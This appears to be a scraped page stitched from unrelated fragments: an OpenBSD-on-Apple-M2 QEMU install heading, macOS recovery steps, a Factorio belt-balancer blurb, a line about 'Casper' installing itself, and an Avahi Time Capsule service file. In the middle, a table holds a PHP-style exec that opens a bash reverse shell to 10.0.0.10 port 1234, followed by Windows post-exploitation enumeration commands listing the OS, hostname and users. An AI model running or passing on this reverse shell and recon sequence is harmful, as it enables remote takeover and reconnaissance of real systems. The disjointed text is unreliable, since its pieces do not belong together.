Minimalist installation of OpenBSD on the apple m2 using qemu
- Apple M2 running macOS Monterey 12.5.1
- QEMU version 7.1.0
- OpenBSD 7.1 arm64
Minimalist installation of OpenBSD on the apple m2 using qemu
a. Boot into recovery using command-R during reboot, wipe the harddrive using Disk Utility, and select reinstall macOS
b. Initial installation will run for approximately 1 hour, and reboot once
c. It will then show a remaining time of about 10-15 minutes
Collection of belt balancers. These balancers could originally be found on the wiki, now there are hosted here and on factorioprints.com.
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| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
| // What system are we connected to? | |
| systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
| // Get the hostname and username (if available) | |
| hostname | |
| echo %username% | |
| // Get users | |
| net users | |
| net user [username] |
This page documents the external/internal behavior of Casper.
Casper installed itself into the following directories:
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| <!DOCTYPE service-group SYSTEM "avahi-service.dtd"> | |
| <service-group> | |
| <name replace-wildcards="yes">%h</name> | |
| <service> | |
| <type>_adisk._tcp</type> | |
| <txt-record>sys=waMa=0,adVF=0x100</txt-record> | |
| <txt-record>dk0=adVN=Time Capsule,adVF=0x82</txt-record> | |
| </service> | |
| <service> |